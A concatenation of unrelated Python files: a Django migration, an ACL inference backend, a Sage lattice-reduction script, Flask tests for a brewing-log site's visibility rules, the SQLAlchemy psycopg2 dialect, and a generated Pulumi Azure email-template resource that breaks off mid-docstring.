        except IOError:  # proc has already terminated
            continue
    _pids_data['last_pids'] = current
    return False
|
# Generated by Django 2.0.4 on 2018-04-18 01:34
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated: normalise mis-cased field names and re-declare the
    post FK/M2M fields (category cascade, tags related_name)."""

    dependencies = [
        ('blog', '0007_auto_20180418_0102'),
    ]
    operations = [
        # Fix inconsistent camel-casing left by earlier migrations.
        migrations.RenameField(
            model_name='index',
            old_name='sub_Heading',
            new_name='sub_heading',
        ),
        migrations.RenameField(
            model_name='post',
            old_name='banner_Photo',
            new_name='banner_photo',
        ),
        migrations.RenameField(
            model_name='post',
            old_name='Status',
            new_name='status',
        ),
        migrations.AlterField(
            model_name='post',
            name='category',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.Category'),
        ),
        migrations.AlterField(
            model_name='post',
            name='tags',
            field=models.ManyToManyField(related_name='Post', to='blog.Tags'),
        ),
    ]
|
"""
acl backend
"""
import dnmetis_backend as dnmetis_backend
import backend.backend as backend
import numpy as np
import os
import pdb
class AclBackend(backend.Backend):
    """Backend adapter driving inference through the native dnmetis_backend
    module (ACL engine)."""

    def __init__(self):
        super(AclBackend, self).__init__()
        # Engine selector passed to every dnmetis_backend call; 5 selects ACL.
        self.ACL=5
        self.outputs = ""
        self.inputs = ""
        self.model_path = ""
        self.cfg_path = ""
    def version(self):
        """Return the backend version string."""
        return "1.0"
    def name(self):
        """Return the backend's display name."""
        return "AclBackend"
    def image_format(self):
        # By default tensorflow uses NHWC (and the cpu implementation only does NHWC)
        return "NHWC"
    def load(self, args):
        """Configure and load the model in the native backend; returns self."""
        # there is no input/output meta data i the graph so it need to come from config.
        if not args.inputs:
            raise ValueError("AclBackend needs inputs")
        if not args.outputs:
            raise ValueError("AclBackend needs outputs")
        self.outputs = args.outputs
        self.inputs = args.inputs
        self.model_path = args.model
        self.cfg_path = args.cfg_path
        # cfg_path is expected to point at e.g. backend_cfg/built-in_config.txt
        dnmetis_backend.backend_setconfig(self.cfg_path)
        dnmetis_backend.backend_load(self.ACL,self.model_path,"")
        return self
    def predict(self, feed):
        """Run one inference and post-process per known output-tensor name."""
        #fed=feed[self.inputs[0]]
        result_list=[]
        result = dnmetis_backend.backend_predict(self.ACL,self.model_path,feed)
        for _ in range(len(self.outputs)):
            #resnet50 tf & caffe
            if 'softmax_tensor' in self.outputs[_] or 'prob' in self.outputs[_]:
                # Probabilities: reduce to the arg-max class id.
                result_list.append(np.argmax(result[_],1))
            # resnet50 tf
            if 'ArgMax' in self.outputs[_]:
                result_list.append(result[_])
        if result_list == []:
            # ssd-resnet34 tf
            result_list = result
        return result_list
    def unload(self):
        """Release the model in the native backend."""
        return dnmetis_backend.backend_unload(self.ACL,self.model_path,"")
|
from .data_structures import \
SDFDataset
from .io import \
IOHandlerSDF
from .fields import \
SDFFieldInfo
|
from sage.all import Zmod, Matrix, factor
def build_matrix(P, M, c=1000):
    """Build a lattice basis for finding a multiplicative relation among the
    primes in ``P`` modulo ``M``.

    Rows consist of the scaled (by ``c``) discrete logarithms of each p in P
    with respect to the unit-group generators of Zmod(q^e) for every prime
    power q^e dividing M, extended with an identity block; one extra row per
    generator carries its scaled multiplicative order.  Reducing the result
    with LLL/BKZ yields short relation vectors.
    """
    factors_M = factor(M)
    rows = []
    # add logarithms
    for p in P:
        row = []
        for q, e in factors_M:
            row.extend(Zmod(q ** e)(p).generalised_log())  # generalised_log() uses unit_gens() generators
        row = [c * x for x in row]  # multiply logs by a large constant to help LLL
        rows.append(row)
    height = len(rows)
    width = len(rows[0])
    # add unit matrix
    for i, row in enumerate(rows):
        row.extend([1 if j == i else 0 for j in range(0, height)])
    # add group orders
    generators_M = [g for q, e in factors_M for g in Zmod(q ** e).unit_gens()]
    for i, g in enumerate(generators_M):
        rows.append([g.multiplicative_order() * c if j == i else 0 for j in range(0, width + height)])
    return Matrix(rows)
if __name__ == "__main__":
    # Group modulus: the multiplicative group order of a prime field.
    M = 7550611589521 - 1
    # Factor base whose relation we are searching for.
    P = [7, 11, 13, 17, 19, 31, 37, 41, 59, 61, 73, 97, 109, 151, 181, 233, 241, 257, 331, 349, 433, 523, 577, 631, 673,
         929, 1103, 1321, 1741, 2089, 4177, 5569, 6961, 7309, 8353, 9281, 13921, 17401, 23311, 29581, 38737, 41761,
         50993, 54001, 57367, 59393, 61681, 75169, 82129, 109621, 127481, 135721, 146161, 168781, 224461, 286831,
         458929, 501121, 509921, 605531, 680803, 789961, 1529761, 1733729, 2416861, 3033169, 3327229, 4334321, 4487297,
         4589281, 4818061, 4876111, 5446417, 7060051, 7553921, 8318071, 8369281]
    X = build_matrix(P, M)
    print(X)
    print("solving...")
    print(X.BKZ(block_size=40))  # the second row should contain the solution
|
import os
import pytest
from flask import url_for
from . import BrewlogTests
@pytest.mark.usefixtures('client_class')
class TestMainPageAnonUser(BrewlogTests):
    """Main-page behaviour for an anonymous visitor.

    Only content belonging to public users (and public brews) may appear;
    anything owned by a hidden user, or itself hidden, must not leak.
    """

    # Absolute path to the app's Jinja templates; re-exposed to pyfakefs in
    # test_announcement_present so rendering still works on the fake FS.
    TEMPLATES_DIR = os.path.join(
        os.path.dirname(os.path.dirname(__file__)),
        'src/brewlog/templates',
    )

    @pytest.fixture(autouse=True)
    def set_up(self):
        # Names double as unique markers asserted against the page text.
        self.url = url_for('home.index')
        self.regular_brewery_name = 'regular brewery no 1'
        self.hidden_brewery_name = 'hidden brewery no 1'
        self.regular_brew_name = 'regular brew no 1'
        self.hidden_brew_name = 'hidden brew no 1'

    def test_common_elements(self):
        """Anonymous visitors see the site header and a login link."""
        rv = self.client.get(self.url)
        assert '>Brew Log</a>' in rv.text
        assert 'login page' in rv.text

    def test_profile_visibility(self, user_factory):
        """Public profiles are listed; hidden profiles are not."""
        public_user = user_factory(is_public=True)
        hidden_user = user_factory(is_public=False)
        rv = self.client.get(self.url)
        assert public_user.full_name in rv.text
        assert hidden_user.full_name not in rv.text

    def test_brewery_visibility_regular_user(self, user_factory, brewery_factory):
        """A public user's brewery is visible."""
        public_user = user_factory(is_public=True)
        brewery = brewery_factory(
            brewer=public_user, name=self.regular_brewery_name
        )
        rv = self.client.get(self.url)
        assert public_user.full_name in rv.text
        assert brewery.name in rv.text

    def test_brewery_visibility_hidden_user(self, user_factory, brewery_factory):
        """A hidden user's brewery is hidden along with the user."""
        user = user_factory(is_public=False)
        brewery = brewery_factory(
            brewer=user, name=self.hidden_brewery_name
        )
        rv = self.client.get(self.url)
        assert user.full_name not in rv.text
        assert brewery.name not in rv.text

    def test_brew_visibility_regular_brew_regular_user(
        self, brew_factory, brewery_factory, user_factory,
    ):
        """Public user + public brew: everything is shown."""
        user = user_factory(is_public=True)
        brewery = brewery_factory(
            brewer=user, name=self.regular_brewery_name
        )
        brew = brew_factory(brewery=brewery, name=self.regular_brew_name)
        rv = self.client.get(self.url)
        assert user.full_name in rv.text
        assert brewery.name in rv.text
        assert brew.name in rv.text

    def test_brew_visibility_regular_brew_hidden_user(
        self, brew_factory, brewery_factory, user_factory,
    ):
        """Hidden user: even a public brew of theirs is suppressed."""
        user = user_factory(is_public=False)
        brewery = brewery_factory(
            brewer=user, name=self.regular_brewery_name
        )
        brew = brew_factory(brewery=brewery, name=self.regular_brew_name)
        rv = self.client.get(self.url)
        assert user.full_name not in rv.text
        assert brewery.name not in rv.text
        assert brew.name not in rv.text

    def test_brew_visibility_hidden_brew_hidden_user(
        self, brew_factory, brewery_factory, user_factory,
    ):
        """Hidden user + hidden brew: nothing is shown.

        NOTE(review): intentionally reuses the 'regular' name strings --
        visibility comes from the flags, not the names.
        """
        user = user_factory(is_public=False)
        brewery = brewery_factory(
            brewer=user, name=self.regular_brewery_name
        )
        brew = brew_factory(
            brewery=brewery, name=self.regular_brew_name, is_public=False
        )
        rv = self.client.get(self.url)
        assert user.full_name not in rv.text
        assert brewery.name not in rv.text
        assert brew.name not in rv.text

    def test_brew_visibility_hidden_brew_regular_user(
        self, brew_factory, brewery_factory, user_factory,
    ):
        """Public user + hidden brew: user and brewery show, brew does not."""
        user = user_factory(is_public=True)
        brewery = brewery_factory(
            brewer=user, name=self.regular_brewery_name
        )
        brew = brew_factory(
            brewery=brewery, name=self.regular_brew_name, is_public=False
        )
        rv = self.client.get(self.url)
        assert user.full_name in rv.text
        assert brewery.name in rv.text
        assert brew.name not in rv.text

    @pytest.mark.options(ANNOUNCEMENT_FILE='/tmp/dummy/announcement.md')
    def test_announcement_present(self, fs):
        """A configured announcement file is rendered as Markdown on the page."""
        file_name = '/tmp/dummy/announcement.md'
        fs.create_file(file_name, contents='This **very important** announcement.')
        # Re-expose the real template directory inside the fake filesystem.
        fs.add_real_directory(self.TEMPLATES_DIR)
        rv = self.client.get(self.url)
        assert '<strong>very important</strong>' in rv.text
@pytest.mark.usefixtures('client_class')
class TestMainPageLoggedInRegularUser(BrewlogTests):
    """Main-page behaviour for an authenticated, public user."""

    @pytest.fixture(autouse=True)
    def set_up(self, user_factory):
        self.url = url_for('home.index')
        self.regular_brewery_name = 'regular brewery no 1'
        self.hidden_brewery_name = 'hidden brewery no 1'
        self.regular_brew_name = 'regular brew no 1'
        self.hidden_brew_name = 'hidden brew no 1'
        self.user = user_factory()

    def test_common_elements(self):
        """Logged-in users get a profile link instead of the login link."""
        self.login(self.user.email)
        page = self.client.get(self.url).text
        assert '>Brew Log</a>' in page
        assert 'my profile' in page
        assert 'login page' not in page

    def test_dashboard_brews(self, brew_factory, brewery_factory):
        """Owners see all of their own brews, hidden ones included."""
        self.login(self.user.email)
        own_brewery = brewery_factory(brewer=self.user, name=self.regular_brewery_name)
        visible_brew = brew_factory(brewery=own_brewery, name=self.regular_brew_name)
        concealed_brew = brew_factory(brewery=own_brewery, name=self.hidden_brew_name)
        page = self.client.get(self.url).text
        assert visible_brew.name in page
        assert concealed_brew.name in page
@pytest.mark.usefixtures('client_class')
class TestMainPageLoggedInHiddenUser(BrewlogTests):
    """Main-page behaviour for an authenticated user whose profile is hidden."""

    @pytest.fixture(autouse=True)
    def set_up(self, user_factory):
        self.url = url_for('home.index')
        self.brewery_name = 'regular brewery no 1'
        self.regular_brew_name = 'regular brew no 1'
        self.hidden_brew_name = 'hidden brew no 1'
        self.user = user_factory(is_public=False)

    def test_common_elements(self):
        """Even hidden users get the standard logged-in chrome."""
        self.login(self.user.email)
        page = self.client.get(self.url).text
        assert '>Brew Log</a>' in page
        assert 'my profile' in page
        assert 'login page' not in page

    def test_dashboard_brews(self, brew_factory, brewery_factory):
        """A hidden owner still sees every one of their own brews."""
        self.login(self.user.email)
        own_brewery = brewery_factory(brewer=self.user, name=self.brewery_name)
        visible_brew = brew_factory(brewery=own_brewery, name=self.regular_brew_name)
        concealed_brew = brew_factory(brewery=own_brewery, name=self.hidden_brew_name)
        page = self.client.get(self.url).text
        assert visible_brew.name in page
        assert concealed_brew.name in page
|
"""Support for the PostgreSQL database via the psycopg2 driver.
Driver
------
The psycopg2 driver is supported, available at http://pypi.python.org/pypi/psycopg2/ .
The dialect has several behaviors which are specifically tailored towards compatibility
with this module.
Note that psycopg1 is **not** supported.
Connecting
----------
URLs are of the form `postgresql+psycopg2://user:password@host:port/dbname[?key=value&key=value...]`.
psycopg2-specific keyword arguments which are accepted by :func:`~sqlalchemy.create_engine()` are:
* *server_side_cursors* - Enable the usage of "server side cursors" for SQL statements which support
this feature. What this essentially means from a psycopg2 point of view is that the cursor is
created using a name, e.g. `connection.cursor('some name')`, which has the effect that result rows
are not immediately pre-fetched and buffered after statement execution, but are instead left
on the server and only retrieved as needed. SQLAlchemy's :class:`~sqlalchemy.engine.base.ResultProxy`
uses special row-buffering behavior when this feature is enabled, such that groups of 100 rows
at a time are fetched over the wire to reduce conversational overhead.
* *use_native_unicode* - Enable the usage of Psycopg2 "native unicode" mode per connection. True
by default.
* *isolation_level* - Sets the transaction isolation level for each transaction
within the engine. Valid isolation levels are `READ_COMMITTED`,
`READ_UNCOMMITTED`, `REPEATABLE_READ`, and `SERIALIZABLE`.
Transactions
------------
The psycopg2 dialect fully supports SAVEPOINT and two-phase commit operations.
Per-Statement Execution Options
-------------------------------
The following per-statement execution options are respected:
* *stream_results* - Enable or disable usage of server side cursors for the SELECT-statement.
If *None* or not set, the *server_side_cursors* option of the connection is used. If
auto-commit is enabled, the option is ignored.
"""
import decimal
import random
import re

from sqlalchemy import exc
from sqlalchemy import processors
from sqlalchemy import types as sqltypes
from sqlalchemy import util
from sqlalchemy.dialects.postgresql.base import PGDialect, PGCompiler, \
    PGIdentifierPreparer, PGExecutionContext, \
    ENUM, ARRAY
from sqlalchemy.engine import base, default
from sqlalchemy.sql import expression
from sqlalchemy.sql import operators as sql_operators
class _PGNumeric(sqltypes.Numeric):
    """Numeric type for psycopg2, converting between what the driver returns
    natively and what the user asked for via ``asdecimal``.

    PG type OIDs seen in ``coltype``: 700 = FLOAT4, 701 = FLOAT8 (psycopg2
    returns Python float), 1700 = NUMERIC (psycopg2 returns Decimal).

    Fix: ``exc`` was referenced here without being imported, so the error
    branches raised ``NameError`` instead of ``InvalidRequestError``; the
    module imports now include ``from sqlalchemy import exc``.  The inline
    comments previously mentioned pg8000 -- a copy/paste from the pg8000
    dialect -- and have been corrected for psycopg2.
    """

    def bind_processor(self, dialect):
        # psycopg2 adapts Decimal and float on the way in; nothing to do.
        return None

    def result_processor(self, dialect, coltype):
        if self.asdecimal:
            if coltype in (700, 701):
                # driver gives float for FLOAT4/FLOAT8; convert to Decimal
                return processors.to_decimal_processor_factory(decimal.Decimal)
            elif coltype == 1700:
                # psycopg2 returns Decimal natively for NUMERIC (1700)
                return None
            else:
                raise exc.InvalidRequestError(
                    "Unknown PG numeric type: %d" % coltype)
        else:
            if coltype in (700, 701):
                # psycopg2 returns float natively for FLOAT4/FLOAT8
                return None
            elif coltype == 1700:
                # driver gives Decimal for NUMERIC; convert to float
                return processors.to_float
            else:
                raise exc.InvalidRequestError(
                    "Unknown PG numeric type: %d" % coltype)
class _PGEnum(ENUM):
    """ENUM subclass that upgrades ``convert_unicode=True`` to ``"force"``,
    since psycopg2 may hand enum labels back as byte strings."""
    def __init__(self, *arg, **kw):
        super(_PGEnum, self).__init__(*arg, **kw)
        if self.convert_unicode:
            self.convert_unicode = "force"
class _PGArray(ARRAY):
    """ARRAY subclass that forces unicode conversion on string item types,
    mirroring the _PGEnum treatment for array elements."""
    def __init__(self, *arg, **kw):
        super(_PGArray, self).__init__(*arg, **kw)
        # FIXME: this check won't work for setups that
        # have convert_unicode only on their create_engine().
        if isinstance(self.item_type, sqltypes.String) and \
            self.item_type.convert_unicode:
            self.item_type.convert_unicode = "force"
# When we're handed literal SQL, ensure it's a SELECT-query. Since
# 8.3, combining cursors and "FOR UPDATE" has been fine.
# Matches optional leading whitespace then SELECT, case-insensitively;
# used below to decide whether literal SQL may get a server-side cursor.
SERVER_SIDE_CURSOR_RE = re.compile(
    r'\s*SELECT',
    re.I | re.UNICODE)
class PostgreSQL_psycopg2ExecutionContext(PGExecutionContext):
    """Execution context that opts into psycopg2 named (server-side) cursors
    when the dialect/statement combination allows it."""

    def create_cursor(self):
        """Return a cursor; a *named* cursor when server-side mode applies.

        Server-side is used when the dialect enables server_side_cursors,
        'stream_results' is not explicitly disabled, and the statement is
        either a compiled Selectable or literal SQL that starts with SELECT.
        """
        # TODO: coverage for server side cursors + select.for_update()
        if self.dialect.server_side_cursors:
            is_server_side = \
                self.execution_options.get('stream_results', True) and (
                    (self.compiled and isinstance(self.compiled.statement, expression.Selectable) \
                    or \
                    (
                        (not self.compiled or
                        isinstance(self.compiled.statement, expression._TextClause))
                        and self.statement and SERVER_SIDE_CURSOR_RE.match(self.statement))
                    )
                )
        else:
            is_server_side = self.execution_options.get('stream_results', False)

        # Name-mangled attribute; read again by get_result_proxy() below.
        self.__is_server_side = is_server_side
        if is_server_side:
            # use server-side cursors:
            # http://lists.initd.org/pipermail/psycopg/2007-January/005251.html
            # Named cursors require a per-execution unique name.
            ident = "c_%s_%s" % (hex(id(self))[2:], hex(random.randint(0, 65535))[2:])
            return self._connection.connection.cursor(ident)
        else:
            return self._connection.connection.cursor()

    def get_result_proxy(self):
        """Use the row-buffering proxy when rows live on the server."""
        if self.__is_server_side:
            return base.BufferedRowResultProxy(self)
        else:
            return base.ResultProxy(self)
class PostgreSQL_psycopg2Compiler(PGCompiler):
    """SQL compiler adjustments for psycopg2's pyformat parameter style."""

    def visit_mod(self, binary, **kw):
        # '%' must be doubled so psycopg2 does not read it as a bind marker.
        lhs = self.process(binary.left)
        rhs = self.process(binary.right)
        return "%s %%%% %s" % (lhs, rhs)

    def post_process_text(self, text):
        # Escape literal percent signs in raw SQL text for pyformat.
        return text.replace('%', '%%')
class PostgreSQL_psycopg2IdentifierPreparer(PGIdentifierPreparer):
    """Identifier preparer that also escapes '%' for the pyformat style."""

    def _escape_identifier(self, value):
        quoted = value.replace(self.escape_quote, self.escape_to_quote)
        # Double percent signs so they survive pyformat substitution.
        return quoted.replace('%', '%%')
class PostgreSQL_psycopg2(PGDialect):
    """PostgreSQL dialect bound to the psycopg2 DB-API driver."""
    driver = 'psycopg2'
    # Statements are sent as byte strings; only binds honor native unicode.
    supports_unicode_statements = False
    default_paramstyle = 'pyformat'
    supports_sane_multi_rowcount = False
    execution_ctx_cls = PostgreSQL_psycopg2ExecutionContext
    statement_compiler = PostgreSQL_psycopg2Compiler
    preparer = PostgreSQL_psycopg2IdentifierPreparer
    colspecs = util.update_copy(
        PGDialect.colspecs,
        {
            sqltypes.Numeric : _PGNumeric,
            ENUM : _PGEnum, # needs force_unicode
            sqltypes.Enum : _PGEnum, # needs force_unicode
            ARRAY : _PGArray, # needs force_unicode
        }
    )

    def __init__(self, server_side_cursors=False, use_native_unicode=True, **kwargs):
        """
        :param server_side_cursors: use named (server-side) cursors where
            possible; see the execution context above.
        :param use_native_unicode: register psycopg2's UNICODE extension on
            each new connection so strings come back as unicode.
        """
        PGDialect.__init__(self, **kwargs)
        self.server_side_cursors = server_side_cursors
        self.use_native_unicode = use_native_unicode
        self.supports_unicode_binds = use_native_unicode

    @classmethod
    def dbapi(cls):
        # Imported lazily so this module can load without psycopg2 installed.
        psycopg = __import__('psycopg2')
        return psycopg

    # Optional hook: callable that unwraps a proxied DB-API connection before
    # psycopg2 extensions are registered on it (None = no unwrapping).
    _unwrap_connection = None

    def visit_pool(self, pool):
        """Attach a pool listener that enables native unicode per connection."""
        if self.dbapi and self.use_native_unicode:
            extensions = __import__('psycopg2.extensions').extensions
            def connect(conn, rec):
                if self._unwrap_connection:
                    conn = self._unwrap_connection(conn)
                    # Unwrapper may decline (return None); skip registration.
                    if conn is None:
                        return
                extensions.register_type(extensions.UNICODE, conn)
            pool.add_listener({'first_connect': connect, 'connect':connect})
        super(PostgreSQL_psycopg2, self).visit_pool(pool)

    def create_connect_args(self, url):
        """Translate the SQLAlchemy URL into psycopg2 connect() kwargs."""
        opts = url.translate_connect_args(username='user')
        if 'port' in opts:
            # psycopg2 expects an integer port, not the URL's string.
            opts['port'] = int(opts['port'])
        opts.update(url.query)
        return ([], opts)

    def is_disconnect(self, e):
        """Heuristically classify driver exceptions as dropped connections."""
        if isinstance(e, self.dbapi.OperationalError):
            return 'closed the connection' in str(e) or 'connection not open' in str(e)
        elif isinstance(e, self.dbapi.InterfaceError):
            return 'connection already closed' in str(e) or 'cursor already closed' in str(e)
        elif isinstance(e, self.dbapi.ProgrammingError):
            # yes, it really says "losed", not "closed"
            return "losed the connection unexpectedly" in str(e)
        else:
            return False
dialect = PostgreSQL_psycopg2
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['EmailTemplateArgs', 'EmailTemplate']
@pulumi.input_type
class EmailTemplateArgs:
    """Constructor arguments for an ``EmailTemplate`` resource.

    All five inputs are required.  NOTE: this file is generated by the
    Pulumi Terraform Bridge (tfgen); regenerate rather than hand-edit.
    """
    def __init__(__self__, *,
                 api_management_name: pulumi.Input[str],
                 body: pulumi.Input[str],
                 resource_group_name: pulumi.Input[str],
                 subject: pulumi.Input[str],
                 template_name: pulumi.Input[str]):
        """
        The set of arguments for constructing a EmailTemplate resource.
        :param pulumi.Input[str] api_management_name: The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
        :param pulumi.Input[str] body: The body of the Email. Its format has to be a well-formed HTML document.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
        :param pulumi.Input[str] subject: The subject of the Email.
        :param pulumi.Input[str] template_name: The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
        """
        pulumi.set(__self__, "api_management_name", api_management_name)
        pulumi.set(__self__, "body", body)
        pulumi.set(__self__, "resource_group_name", resource_group_name)
        pulumi.set(__self__, "subject", subject)
        pulumi.set(__self__, "template_name", template_name)

    @property
    @pulumi.getter(name="apiManagementName")
    def api_management_name(self) -> pulumi.Input[str]:
        """
        The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
        """
        return pulumi.get(self, "api_management_name")

    @api_management_name.setter
    def api_management_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "api_management_name", value)

    @property
    @pulumi.getter
    def body(self) -> pulumi.Input[str]:
        """
        The body of the Email. Its format has to be a well-formed HTML document.
        """
        return pulumi.get(self, "body")

    @body.setter
    def body(self, value: pulumi.Input[str]):
        pulumi.set(self, "body", value)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Input[str]:
        """
        The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter
    def subject(self) -> pulumi.Input[str]:
        """
        The subject of the Email.
        """
        return pulumi.get(self, "subject")

    @subject.setter
    def subject(self, value: pulumi.Input[str]):
        pulumi.set(self, "subject", value)

    @property
    @pulumi.getter(name="templateName")
    def template_name(self) -> pulumi.Input[str]:
        """
        The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
        """
        return pulumi.get(self, "template_name")

    @template_name.setter
    def template_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "template_name", value)
@pulumi.input_type
class _EmailTemplateState:
    """State inputs for looking up / filtering ``EmailTemplate`` resources.

    Unlike ``EmailTemplateArgs`` every field is optional, and the
    provider-computed outputs ``description`` and ``title`` are included.
    NOTE: generated by tfgen; regenerate rather than hand-edit.
    """
    def __init__(__self__, *,
                 api_management_name: Optional[pulumi.Input[str]] = None,
                 body: Optional[pulumi.Input[str]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 subject: Optional[pulumi.Input[str]] = None,
                 template_name: Optional[pulumi.Input[str]] = None,
                 title: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering EmailTemplate resources.
        :param pulumi.Input[str] api_management_name: The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
        :param pulumi.Input[str] body: The body of the Email. Its format has to be a well-formed HTML document.
        :param pulumi.Input[str] description: The description of the Email Template.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
        :param pulumi.Input[str] subject: The subject of the Email.
        :param pulumi.Input[str] template_name: The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
        :param pulumi.Input[str] title: The title of the Email Template.
        """
        if api_management_name is not None:
            pulumi.set(__self__, "api_management_name", api_management_name)
        if body is not None:
            pulumi.set(__self__, "body", body)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if resource_group_name is not None:
            pulumi.set(__self__, "resource_group_name", resource_group_name)
        if subject is not None:
            pulumi.set(__self__, "subject", subject)
        if template_name is not None:
            pulumi.set(__self__, "template_name", template_name)
        if title is not None:
            pulumi.set(__self__, "title", title)

    @property
    @pulumi.getter(name="apiManagementName")
    def api_management_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
        """
        return pulumi.get(self, "api_management_name")

    @api_management_name.setter
    def api_management_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "api_management_name", value)

    @property
    @pulumi.getter
    def body(self) -> Optional[pulumi.Input[str]]:
        """
        The body of the Email. Its format has to be a well-formed HTML document.
        """
        return pulumi.get(self, "body")

    @body.setter
    def body(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "body", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        The description of the Email Template.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter
    def subject(self) -> Optional[pulumi.Input[str]]:
        """
        The subject of the Email.
        """
        return pulumi.get(self, "subject")

    @subject.setter
    def subject(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subject", value)

    @property
    @pulumi.getter(name="templateName")
    def template_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
        """
        return pulumi.get(self, "template_name")

    @template_name.setter
    def template_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "template_name", value)

    @property
    @pulumi.getter
    def title(self) -> Optional[pulumi.Input[str]]:
        """
        The title of the Email Template.
        """
        return pulumi.get(self, "title")

    @title.setter
    def title(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "title", value)
class EmailTemplate(pulumi.CustomResource):
    """Manages an API Management Email Template.

    NOTE: generated by the Pulumi Terraform Bridge (tfgen); regenerate
    rather than hand-edit.  ``__init__`` accepts either an
    ``EmailTemplateArgs`` bundle or the individual keyword arguments
    (see the two overloads below).
    """
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 api_management_name: Optional[pulumi.Input[str]] = None,
                 body: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 subject: Optional[pulumi.Input[str]] = None,
                 template_name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Manages a API Management Email Template.
        ## Import
        API Management Email Templates can be imported using the `resource id`, e.g.
        ```sh
        $ pulumi import azure:apimanagement/emailTemplate:EmailTemplate example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.ApiManagement/service/instance1/templates/template1
        ```
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] api_management_name: The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
        :param pulumi.Input[str] body: The body of the Email. Its format has to be a well-formed HTML document.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
        :param pulumi.Input[str] subject: The subject of the Email.
